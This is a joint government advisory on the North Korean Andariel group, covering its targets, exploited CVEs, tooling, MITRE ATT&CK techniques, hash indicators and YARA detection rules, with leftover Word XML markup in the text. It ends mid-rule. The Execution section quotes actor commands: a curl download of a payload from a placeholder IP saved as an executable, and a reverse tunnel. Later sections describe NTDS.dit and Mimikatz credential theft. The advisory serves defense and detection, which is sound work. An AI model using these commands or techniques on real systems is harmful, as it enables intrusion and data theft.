radar, phased-array radar, and other radar systems Nuclear Uranium processing and enrichment Material waste and storage Nuclear power plants Government nuclear facilities and research institutes Engineering Shipbuilding and marine engineering Robot machinery and mechanical arms Additive manufacturing and 3D printing components and technology Casting, fabrication, high-heat metal molding, and rubber and plastic molding Machining processes and technology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information targeted-such as contract specifications, bills of materials, project details, design drawings, and engineering documents-has military and civilian applications and leads the authoring agencies to assess one of the group's chief responsibilities as satisfying collection requirements for Pyongyang's nuclear and defense programs. Ransomware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Andariel actors fund their espionage activity through ransomware operations against U.S. healthcare entities, and in some instances, the authoring agencies have observed the actors launching ransomware attacks and conducting cyber espionage operations on the same day and/or leveraging ransomware and cyber espionage against the same entity. For more information on this ransomware activity, see joint advisories #StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities and North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector. Malicious Cyber Espionage Activity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advisory uses the MITRE ATT&amp;CK for Enterprise framework, version 15. See the Appendix: MITRE ATT&amp;CK Techniques for all referenced tactics and techniques. Reconnaissance and Enumeration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there is limited available information on the group's initial reconnaissance methods, the actors likely identify vulnerable systems using publicly available internet scanning tools that reveal information such as vulnerabilities in public-facing web servers [T1595, T1592]. The actors gather open source information about their victims for use in targeting [T1591] and research Common Vulnerabilities and Exposures (CVEs) when published to the National Institute of Standards and Technology (NIST) National Vulnerability Database [T1596]. CVEs researched include: CVE-2023-46604 - Apache ActiveMQ CVE-2023-42793 - TeamCity CVE-2023-3519 - Citrix NetScaler CVE-2023-35078 - Ivanti Endpoint Manager Mobile (EPMM) CVE-2023-34362 - MOVEIt CVE-2023-33246 - RocketMQ CVE-2023-32784 - KeePass CVE-2023-32315 - Openfire CVE-2023-3079 - Google Chromium V8 Type Confusion CVE-2023-28771 and CVE-2023-33010 - Zyxell firmware CVE-2023-2868 - Barracuda Email Security Gateway CVE-2023-27997 - FortiGate SSL VPN CVE-2023-25690 - Apache HTTP Server CVE-2023-21932 - Oracle Hospitality Opera 5 CVE-2023-0669 - GoAnywhere MFT CVE-2022-47966 - ManageEngine CVE-2022-41352 and CVE-2022-27925 - Zimbra Collaboration Suite CVE-2022-30190 - Microsoft Windows Support Diagnostic Tool CVE-2022-25064 - TP-LINK CVE-2022-24990 and CVE-2021-45837 - TerraMaster NAS CVE-2022-24785 - Moment.js CVE-2022-24665, CVE-2022-24664, and CVE-2022-24663 - PHP Everywhere CVE-2022-22965 - Spring4Shell CVE-2022-22947 - Spring Cloud Gateway CVE-2022-22005 - Microsoft SharePoint Server CVE-2022-21882 - Win32k Elevation of Privilege CVE-2021-44228 - Apache Log4j CVE-2021-44142 - Samba vfs_fruit module CVE-2021-43226, CEV-2021-43207, CVE-2021-36955 - Windows log file vulnerabilities CVE-2021-41773 - Apache HTTP Server 2.4.49 CVE-2021-40684 - Talend ESB Runtime CVE-2021-3018 - IPeakCMS 3.5 CVE-2021-20038 - SMA100 Apache httpd server (SonicWall) CVE-2021-20028 - SonicWall Secure Remote Access (SRA) CVE-2019-15637 - Tableau CVE-2019-7609 - Kibana CVE-2019-0708 - Microsoft Remote Desktop Services CVE-2017-4946 - VMware V4H and V4PA Resource Development, Tooling, and Remote Access Tools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The actors leverage custom tools and malware for discovery and execution. Over the last 15 years, the group has developed RATs, including the following, to permit remote access and manipulation of systems and lateral </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>movement.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Atharvan ELF Backdoor Jupiter MagicRAT "No Pineapple" TigerRAT Valefor/VSingle ValidAlpha YamaBot NukeSped Goat RAT Black RAT AndarLoader DurianBeacon Trifaux KaosRAT Preft Andariel Scheduled Task Malware BottomLoader (see Cisco Talos blog Operation Blacksmith) NineRAT (see Cisco Talos blog Operation Blacksmith) DLang (see Cisco Talos blog Operation Blacksmith) Nestdoor (see AhnLab blog)</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These tools include functionality for executing arbitrary commands, keylogging, screenshots, listing files and directories, browser history retrieval, process snooping, creating and writing to files, capturing network connections, and uploading content to command and control (C2) [T1587.001, T1587.004]. The tools allow the actors to maintain access to the victim system with each implant having a designated C2 node. Commodity Malware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Commodity malware is malicious software widely available for purchase or use and is leveraged by numerous different threat actors. The use of publicly available malware enables the actors to conceal and obfuscate their identities and leads to attribution problems. The authoring agencies are reliant on the use of custom malware and loaders, along with overlapping C2 nodes to attribute commodity malware to the actors. The actors have at times achieved great success leveraging just open source malware. The authoring agencies have identified the following open-source tools as used and/or customized by the actors: 3Proxy [T1090] AdFind [S0552] AsyncRAT DeimosC2 Impacket [T1090] Juggernaut [T1040] Lilith RAT ORVX Web Shell Mimikatz [S0002] PLINK [T1572] ProcDump [T1003] PuTTY [T1572] SOCKS5 [T1090] Stunnel [T1572] Web Shell by Orb (WSO) WinRAR [T1560] WinSCP [T1048] RDP Wrapper [T1572] Initial Access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actors gain initial access through widespread exploitation of web servers through known vulnerabilities, such as CVE-2021-44228 ("Log4Shell") in Apache's Log4j software library and other CVEs listed above, to deploy web shells and gain access to sensitive information and applications for further exploitation. The actors continue to breach organizations by exploiting web server vulnerabilities in public-facing devices and have conducted widespread activity against a number of different organizations simultaneously [T1190]. Execution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actors are well-versed in using native tools and processes on systems, known as living off the land (LOTL). They use Windows command line, PowerShell, Windows Management Instrumentation command line (WMIC), and Linux bash, for system, network, and account enumeration. While individual commands typically vary, the authoring agencies assess the actors prefer netstat commands, such as netstat -naop and netstat -noa [T1059]. Example commands used by the actors include the following: netstat -naop netstat -noa pvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password] &lt;Remote_IP&gt; curl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe C:\windows\system32\cmd.exe /c systeminfo | findstr Logon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These actors often make typos and other mistakes, indicating that the commands are not directly copied from a playbook and the actors have a flexible and impromptu approach. The typos also illustrate a poor grasp of the English language, including common errors such as "Microsoft Cooperation" (rather than "Microsoft Corporation") found across numerous RGB 3rd Bureau malware samples. Defense Evasion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actors routinely pack late-stage tooling in VMProtect and Themida. Malicious tooling packed with these and other commercial tools have advanced anti-debugging and detection capabilities. These files are typically multiple megabytes in size and often contain unusual file section names such as vmp0 and vmp1 for VMProtect and Themida or randomized file section names for Themida [T1027]. Credential Access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actors employ a multi-pronged approach to stealing credentials to gain additional access to systems, including the use of publicly available credential theft tools such as Mimikatz, ProcDump, and Dumpert and accessing the Active Directory domain database through targeting of the NTDS.dit file. The authoring agencies assess the actors change settings on compromised systems to force the system to store credentials and then use the aforementioned tools to steal credentials. In one instance, the actors used the vssadmin command-line utility to back up a volume to retrieve a copy of the NTDS.dit file containing Active Directory data. In another instance, the actors were observed collecting registry hive data for offline extraction of credentials [T1003]. Discovery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actors used customized file system enumeration tooling written in .NET. The tool is capable of receiving and executing command line arguments to enumerate directories and files and compress output files. The tool collects the following information for each drive targeted on a system: depth relative to starting path, name, last write time, last access time, creation time, size, and attributes [T1087, T1083].</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actors also enumerate directories and files of connected devices using Server Message Block (SMB) protocol, which enables network file sharing and the ability to request services and programs from a network [T1021.002]. Lateral Movement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actors also use system logging for discovery to move laterally. The group logs active window changes, clipboard data, and keystrokes and saves the collected logging information to the %Temp% directory.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actors have also used Remote Desktop Protocol (RDP) to move laterally [T1021]. Command and Control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actors leverage techniques and infrastructure positioned around the world to send commands to compromised systems. The actors disguise their malware within HTTP packets to appear as benign network traffic. They also use tunneling tools such as 3Proxy, PLINK, and Stunnel as well as custom proxy tunneling tools to tunnel traffic over a variety of protocols from inside a network back to a C2 server. Tunneling enables the actors to perform C2 operations despite network configurations that would typically pose a challenge, such as the use of Network Address Translation (NAT) or traffic funneled through a web proxy [T1090, T1071]. Collection and Exfiltration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Malware previously used by the actors permitted placement and access to search through files that could be of interest, including scanning computer files for keywords related to defense and military sectors in English and Korean. The actors identify data for theft by enumerating files and folders across many directories and servers using command-line activity or functionality built into custom tools. The actors collect the relevant files into RAR archives, sometimes using a version of WinRAR brought into the victim's environment with other malicious tooling [T1560, T1039].</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actors typically exfiltrate data to web services such as cloud storage or servers not associated with their primary C2. Notably, the actors have been observed logging into actor-controlled cloud-based storage service accounts directly from victim networks to exfiltrate data [T1567]. The actors have also been observed using the utilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP) and other protocols [T1048].</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actors have also been identified staging files for exfiltration on victim machines, establishing Remote Desktop Protocol connections, and conducting HTTP GET requests on port 80 to receive information [T1021]. Indicators of Compromise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See below for Andariel IOCs.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The following include observed MD5 hashes: 88a7c84ac7f7ed310b5ee791ec8bd6c5 6ab4eb4c23c9e419fbba85884ea141f4 97ce00c7ef1f7d98b48291d73d900181 079b4588eaa99a1e802adf5e0b26d8aa 0873b5744d8ab6e3fe7c9754cf7761a3 0d696d27bae69a62def82e308d28857a 0ecf4bac2b070cf40f0b17e18ce312e6 17c46ed7b80c2e4dbea6d0e88ea0827c 1f2410c3c25dadf9e0943cd634558800 2968c20a07cfc97a167aa3dd54124cda 33e85d0f3ef2020cdb0fc3c8d80e8e69 4118d9adce7350c3eedeb056a3335346 4aa57e1c66c2e01f2da3f106ed2303fa 58ad3103295afcc22bde8d81e77c282f 5c41cbf8a7620e10f158f6b70963d1cb 61a949553d35f31957db6442f36730c5 72a22afde3f820422cfdbba7a4cbabde 84bd45e223b018e67e4662c057f2c47e 86465d92f0d690b62866f52f5283b9fc 8b395cc6ecdec0900facf6e93ec48fbb 97f352e2808c78eef9b31c758ca13032 a50f3b7aa11b977ae89285b60968aa67 afd25ce56b9808c5ed7eade75d2e12a7 afdeb24975a318fc5f20d9e61422a308 b697b81b341692a0b137b2c748310ea7 bcac28919fa33704a01d7a9e5e3ddf3f c027d641c4c1e9d9ad048cda2af85db6 c892c60817e6399f939987bd2bf5dee0 cdeae978f3293f4e783761bc61b34810 d0f310c99476f1712ac082f78dd29fdc d8da33fae924b991b776797ba8cde24c e230c5728f9ea5a94e390e7da7bf1ffa f4d46629ca15313b94992f3798718df7 fb84a392601fc19aeb7f8ce11b3a4907 ff3194d3d5810a42858f3e22c91500b1 13b4ce1fc26d400d34ede460a8530d93 41895c5416fdc82f7e0babc6bb6c7216 c2f8c9bb7df688d0a7030a96314bb493 33a3da2de78418b89a603e28a1e8852c 4896da30a745079cd6265b6332886d45 73eb2f4f101aab6158c615094f7a632a 7f33d2d2a2ce9c195202acb59de31eee e1afd01400ef405e46091e8ef10c721c fe25c192875ec1914b8880ea3896cda2 232586f8cfe82b80fd0dfa6ed8795c56 c1f266f7ec886278f030e7d7cd4e9131 49bb2ad67a8c5dfbfe8db2169e6fa46e beb199b15bd075996fa8d6a0ed554ca8 4053ca3e37ed1f8d37b29eed61c2e729 3a0c8ae783116c1840740417c4fbe678 0414a2ab718d44bf6f7103cff287b312 ca564428a29faf1a613f35d9fa36313f ad6d4eb34d29e350f96dc8df6d8a092e dc70dc9845aa747001ebf2a02467c203 3d2ec58f37c8176e0dbcc47ff93e5a76 0a09b7f2317b3d5f057180be6b6d0755 1ffccc23fef2964e9b1747098c19d956 9112efb49cae021abebd3e9a564e6ca4 ac0ada011f1544aa3a1cf27a26f2e288 0211a3160cc5871cbcd4e5514449162b 7416ea48102e2715c87edd49ddbd1526 a2aefb7ab6c644aa8eeb482e27b2dbc4 e7fd7f48fbf5635a04e302af50dfb651 33b2b5b7c830c34c688cf6ced287e5be e5410abaaac69c88db84ab3d0e9485ac eb35b75369805e7a6371577b1d2c4531 5a3f3f75048b9cec177838fb8b40b945 9d7bd0caed10cc002670faff7ca130f5 8434cdd34425916be234b19f933ad7ea bbaee4fe73ccff1097d635422fdc0483 79e474e056b4798e0a3e7c60dd67fd28 95c276215dcc1bd7606c0cb2be06bf70 426bb55531e8e3055c942a1a035e46b9 cfae52529468034dbbb40c9a985fa504 deae4be61c90ad6d499f5bdac5dad242 bda0686d02a8b7685adf937cbcd35f46 6de6c27ca8f4e00f0b3e8ff5185a59d1 c61a8c4f6f6870c7ca0013e084b893d2 5291aed100cc48415636c4875592f70c f4795f7aec4389c8323f7f40b50ae46f cf1a90e458966bcba8286d46d6ab052c 792370eb01e16ac3dc511143932d0e1d 612538328e0c4f3e445fb58ef811336a 9767aa592ec2d6ae3c7d40b6049d0466 b22fd0604c4f189f2b7a59c8f48882dd e53ca714787a86c13f07942a56d64efa c7b09f1dd0a5694de677f3ecceda41b7 c8346b39418f92725719f364068a218d 730bff14e80ffd7737a97cdf11362ab5 9a481bc83fea1dea3e3bdfff5e154d44 ddb1f970371fa32faae61fc5b8423d4b 6c2b947921e7c77d9af62ce9a3ed7621 977d30b261f64cc582b48960909d0a89 7ce51b56a6b0f8f78056ddfc5b5de67c dd9625be4a1201c6dfb205c12cf3a381 ecb4a09618e2aba77ea37bd011d7d7f7 0fd8c6f56c52c21c061a94e5765b27b4 c90d094a8fbeaa8a0083c7372bfc1897 0055a266aa536b2fdadb3336ef8d4fba </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>55bb271bbbf19108fec73d224c9b4218 0c046a2f5304ed8d768795a49b99d6e4 f34664e0d9a10974da117c1ca859dba8 a2c2099d503fcc29478205f5aef0283b e439f850aa8ead560c99a8d93e472225 7c30ed6a612a1fd252565300c03c7523 81738405a7783c09906da5c7212e606b c027d641c4c1e9d9ad048cda2af85db6 eb7ba9f7424dffdb7d695b00007a3c6d 3e9ee5982e3054dc76d3ba5cc88ae3de 073e3170a8e7537ff985ec8316319351 9b0e7c460a80f740d455a7521f0eada1 2d02f5499d35a8dffb4c8bc0b7fec5c2 0984954526232f7d05910aa5b07c5893 4156a7283284ece739e1bae05f99e17c 3026d419ee140f3c6acd5bff54132795 7aa132c0cc63a38fb4d1789553266fc7 1a0811472fad0ff507a92c957542fffd f8aef59d0c5afe8df31e11a1984fbc0a 82491b42b9a2d34b13137e36784a67d7 0a199944f757d5615164e8808a3c712a 9c97ea18da290a6833a1d36e2d419efc 16f768eac33f79775a9672018e0d64f5</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following include observed SHA-256 hashes: ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6 db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984 773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df 05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe 1962ebb7bf8d2b306c6f3b55c3dcd69a755eeff1a17577b7606894b781841c3a f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb 6db57bbc2d07343dd6ceba0f53c73756af78f09fe1cb5ce8e8008e5e7242eae1 b7435d23769e79fcbe69b28df4aef062685d1a631892c2354f96d833eae467be 66415464a0795d0569efa5cb5664785f74ed0b92a593280d689f3a2ac68dca66 def2f01fbd4be85f48101e5ab7ddd82efb720e67daa6838f30fd8dcda1977563 323cbe7a3d050230cfaa822c2a22160b4f8c5fe65481dd329841ee2754b522d9 74529dd15d1953a47f0d7ecc2916b2b92865274a106e453a24943ca9ee434643 1e4de822695570421eb2f12fdfe1d32ab8639655e12180a7ab3cf429e7811b8f 8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5 c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469 90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4 452ca47230afd4bb85c45af54fcacbfa544208ef8b4604c3c5caefe3a64dcc19 199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1 2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc ce779e30502ecee991260fd342cc0d7d5f73d1a070395b4120b8d300ad11d694 db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984 c28bb61de4a6ad1c5e225ad9ec2eaf4a6c8ccfff40cf45a640499c0adb0d8740 34d5a5d8bec893519f204b573c33d54537b093c52df01b3d8c518af08ee94947 664f8d19af3400a325998b332343a9304f03bab9738ddab1530869eff13dae54 772b06f34facf6a2ce351b8679ff957cf601ef3ad29645935cb050b4184c8d51 aa29bf4292b68d197f4d8ca026b97ec7785796edcb644db625a8f8b66733ab54 9a5504dcfb7e664259bfa58c46cfd33e554225daf1cedea2ec2a9d83bbbfe238 c2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c 8aa6612c95c7cef49709596da43a0f8354f14d8c08128c4cb9b1f37e548f083b 38f0f2d658e09c57fc78698482f2f638843eb53412d860fb3a99bb6f51025b07</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following include a list of user agent strings used by the actors: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Detection Methods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See Table 2 for YARA rules, created by the FBI, authoring partners, and private industry, that can be used to detect malware used by the actors. Table 2. YARA Rules rule Andariel_ScheduledTask_Loader { strings: $obfuscation1 = { B8 02 00 00 00 48 6B C0 00 B9 CD FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 01 B9 CC FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 02 B9 8D FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 03 B9 9A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 04 B9 8C FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 05 B9 8A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 06 33 C9 66 89 8C 04 60 01 00 00 } $obfuscation2 = { 48 6B C0 02 C6 44 04 20 BA B8 01 00 00 00 48 6B C0 03 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 04 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 05 C6 44 04 20 8A B8 01 00 00 00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>48 6B C0 06 C6 44 04 20 9C B8 01 00 00 00 } $obfuscation3 = { 48 6B C0 00 C6 44 04 20 A8 B8 01 00 00 00 48 6B C0 01 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 02 C6 44 04 20 93 B8 01 00 00 00 48 6B C0 03 C6 44 04 20 96 B8 01 00 00 00 48 6B C0 04 C6 44 04 20 B9 B8 01 00 00 00 48 6B C0 05 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 07 C6 44 04 20 9E B8 01 00 00 00 48 6B C0 08 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 09 C6 44 04 20 8D B8 01 00 00 00 48 6B C0 0A C6 44 04 20 BC B8 01 00 00 00 } condition: uint16(0) == 0x5A4D and $obfuscation1 and $obfuscation2 and $obfuscation3 } rule Andariel_KaosRAT_Yamabot {</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strings: $str1 = "/kaos/" $str2 = "Abstand [" $str3 = "] anwenden" $str4 = "cmVjYXB0Y2hh" $str5 = "/bin/sh" $str6 = "utilities.CIpaddress" $str7 = "engine.NewEgg" $str8 = "%s%04x%s%s%s" $str9 = "Y2FwdGNoYV9zZXNzaW9u" $str10 = "utilities.EierKochen" $str11 = "kandidatKaufhaus"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condition: 3 of them } rule TriFaux_EasyRAT_JUPITER { strings: $InitOnce = "InitOnceExecuteOnce" $BREAK = { 0D 00 0A 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 0D 00 0A } $Bytes = "4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00," wide condition: uint16(0) == 0x5a4d and all of them } rule Andariel_CutieDrop_MagicRAT { strings: $config_os_w = "os/windows" ascii wide $config_os_l = "os/linux" ascii wide $config_os_m = "os/mac" ascii wide $config_comp_msft = "company/microsoft" ascii wide $config_comp_orcl = "company/oracle" ascii wide $POST_field_1 = "session=" ascii wide $POST_field_2 = "type=" ascii wide $POST_field_3 = "id=" ascii wide $command_misspelled = "renmae" ascii wide condition: uint16(0) == 0x5a4d and 7 of them rule Andariel_hhsd_FileTransferTool {</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strings: // 30 4D C7 xor [rbp+buffer_v41+3], cl // 81 7D C4 22 C0 78 00 cmp dword ptr [rbp+buffer_v41], 78C022h // 44 88 83 00 01 00 00 mov [rbx+100h], r8b $handshake = { 30 ?? ?? 81 7? ?? 22 C0 78 00 4? 88 }</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B1 14 mov cl, 14h // C7 45 F7 14 00 41 00 mov [rbp+57h+Src], 410014h // C7 45 FB 7A 00 7F 00 mov [rbp+57h+var_5C], 7F007Ah // C7 45 FF 7B 00 63 00 mov [rbp+57h+var_58], 63007Bh // C7 45 03 7A 00 34 00 mov [rbp+57h+var_54], 34007Ah // C7 45 07 51 00 66 00 mov [rbp+57h+var_50], 660051h // C7 45 0B 66 00 7B 00 mov [rbp+57h+var_4C], 7B0066h // C7 45 0F 66 00 00 00 mov [rbp+57h+var_48], 66h ; 'f' $err_xor_str = { 14 C7 [2] 14 00 41 00 C7 [2] 7A 00 7F 00 C7 [2] 7B 00 63 00 C7 [2] 7A 00 34 00 }</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41 02 D0 add dl, r8b // 44 02 DA add r11b, dl // 3C 1F cmp al, 1Fh $buf_add_cmp_1f = { 4? 02 ?? 4? 02 ?? 3? 1F } // B9 8D 10 B7 F8 mov ecx, 0F8B7108Dh // E8 F1 BA FF FF call sub_140001280 $hash_call_loadlib = { B? 8D 10 B7 F8 E8 } $hash_call_unk = { B? 91 B8 F6 88 E8 }</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condition: uint16(0) == 0x5a4d and (any of ($handshake, $err_xor_str, $buf_add_cmp_1f) and any of ($hash_call_*)) or 2 of ($handshake, $err_xor_str, $buf_add_cmp_1f) rule Andariel_Atharvan_3RAT { strings: $3RAT = "D:\\rang\\TOOL\\3RAT" $atharvan = "Atharvan_dll.pdb" condition: uint16(0) == 0x5a4d and any of them } rule Andariel_LilithRAT_Variant { strings: // The following are strings seen in the open source version of Lilith $lilith_1 = "Initiate a CMD session first." ascii wide $lilith_2 = "CMD is not open" ascii wide $lilith_3 = "Couldn't write command" ascii wide $lilith_4 = "Couldn't write to CMD: CMD not open" ascii wide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 The following are strings that appear to be unique to the Unnamed Trojan based on Lilith $unique_1 = "Upload Error!" ascii wide $unique_2 = "ERROR: Downloading is already running!" ascii wide $unique_3 = "ERROR: Unable to open file:" ascii wide $unique_4 = "General error" ascii wide $unique_5 = "CMD error" ascii wide $unique_6 = "killing self" ascii wide condition: uint16(0) == 0x5a4d and filesize &lt; 150KB and all of ($lilith_*) and 2 of ($unique_*) } rule Andariel_SocksTroy_Strings_OpCodes { strings: $strHost = "-host" wide $strAuth = "-auth" wide $SocksTroy = "SocksTroy" $cOpCodeCheck = { 81 E? A0 00 00 00 0F 84 ?? ?? ?? ?? 83 E? 03 74 ?? 83 E? 02 74 ?? 83 F? 0B } condition: uint16(0) == 0x5a4d and ((1 of ($str*)) and (all of ($c*)) or (all of ($Socks*))) } rule Andariel_Agni { strings: $xor = { 34 ?? 88 01 48 8D 49 01 0F B6 01 84 C0 75 F1 } $stackstrings = {C7 44 24 [5-10] C7 44 24 [5] C7 44 24 [5-10] C7 44 24 [5- 10] C7 44 24} condition: uint16(0) == 0x5a4d and (#xor &gt; 100 and #stackstrings &gt; 5) } rule Andariel_GoLang_validalpha_handshake { strings: $ = { 66 C7 00 AB CD C6 40 02 EF ?? 03 00 00 00 48 89 C1 ?? 03 00 00 00 } condition: all of them } rule Andariel_GoLang_validalpha_tasks { strings: $ = "main.ScreenMonitThread" $ = "main.CmdShell" $ = "main.GetAllFoldersAndFiles" $ = "main.SelfDelete" condition: all of them } rule Andariel_GoLang_validalpha_BlackString { strings: $ = "I:/01___Tools/02__RAT/Black" condition: uint16(0) == 0x5A4D and all of them } rule INDICATOR_EXE_Packed_VMProtect { strings: $s1 = ".vmp0" fullword ascii $s2 = ".vmp1" fullword ascii condition: uint16(0) == 0x5a4d and all of them or for any i in (0 .. pe.number_of_sections) : ( ( pe.sections[i].name == ".vmp0" or pe.sections[i].name == ".vmp1" ) ) } rule INDICATOR_EXE_Packed_Themida { strings: $s1 = ".themida" fullword ascii condition: uint16(0) == 0x5a4d and all of them or for any i in (0 .. pe.number_of_sections) : ( ( pe.sections[i].name == ".themida" ) ) } rule Andariel_elf_backdoor_fipps { strings: $a = "found mac address" $b = "RecvThread" $c = "OpenSSL-1.0.0-fipps" $d = "Disconnected!" condition: (all of them) and uint32(0) == 0x464c457f } rule Andariel_bindshell { strings: $str_comspec = "COMSPEC" $str_consolewindow = "GetConsoleWindow" $str_ShowWindow = "ShowWindow" $str_WSASocketA = "WSASocketA" $str_CreateProcessA = "CreateProcessA" $str_port = {B9 4D 05 00 00 89} condition: uint16(0) == 0x5A4D and all of them } rule Andariel_grease2 { strings: $str_rdpconf = "c: \\windows\\temp\\RDPConf.exe" fullword nocase $str_rdpwinst = "c: \\windows\\temp\\RDPWInst.exe" fullword nocase $str_net_user = "net user" $str_admins_add = "net localgroup administrators" condition: uint16(0) == 0x5A4D and all of them } rule Andariel_NoPineapple_Dtrack_unpacked { strings: $str_nopineapple = "&lt; No Pineapple! &gt;" $str_qt_library = "Qt 5.12.10" $str_xor = {8B 10 83 F6 ?? 83 FA 01 77} condition: uint16(0) == 0x5A4D and all of them } rule </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Andariel_dtrack_unpacked { strings: $str_mutex = "MTX_Global" $str_cmd_1 = "/c net use \\\\" wide $str_cmd_2 = "/c ping -n 3 127.0.01 &gt; NUL % echo EEE &gt; \"%s\"" wide $str_cmd_3 = "/c move /y %s \\\\" wide $str_cmd_4 = "/c systeminfo &gt; \"%s\" &amp; tasklist &gt; \"%s\" &amp; netstat -naop tcp &gt; \"%s\"" wide condition: uint16(0) == 0x5A4D and all of them } rule Andariel_TigerRAT_crowdsourced_rule { strings: $m1 = ".?AVModuleKeyLogger@@" fullword ascii $m2 = ".?AVModulePortForwarder@@" fullword ascii $m3 = ".?AVModuleScreenCapture@@" fullword ascii $m4 = ".?AVModuleShell@@" fullword ascii $s1 = "\\x9891-009942-xnopcopie.dat" fullword wide $s2 = "(%02d : %02d-%02d %02d:%02d:%02d)--- %s[Clipboard]" fullword ascii $s3 = "[%02d : %02d-%02d %02d:%02d:%02d]--- %s[Title]" fullword ascii $s4 = "del \"%s\"%s \"%s\" goto " ascii $s5 = "[&lt;&lt;]" fullword ascii condition: uint16(0) == 0x5a4d and (all of ($s*) or (all of ($m*) and 1 of ($s*)) or (2 of ($m*) and 2 of ($s*))) } rule win_tiger_rat_auto { strings: $sequence_0 = { 33c0 89442438 89442430 448bcf 4533c0 } // n = 5, score = 200 // 33c0 | jmp 5 // 89442438 | dec eax // 89442430 | mov eax, ecx // 448bcf | movzx eax, byte ptr [eax] // 4533c0 | dec eax</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$sequence_1 = { 41b901000000 488bd6 488bcb e8???????? } // n = 4, score = 200 // 41b901000000 | dec eax // 488bd6 | mov eax, dword ptr [ecx] // 488bcb | jmp 8 // e8???????? |</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$sequence_2 = { 4881ec90050000 8b01 8985c8040000 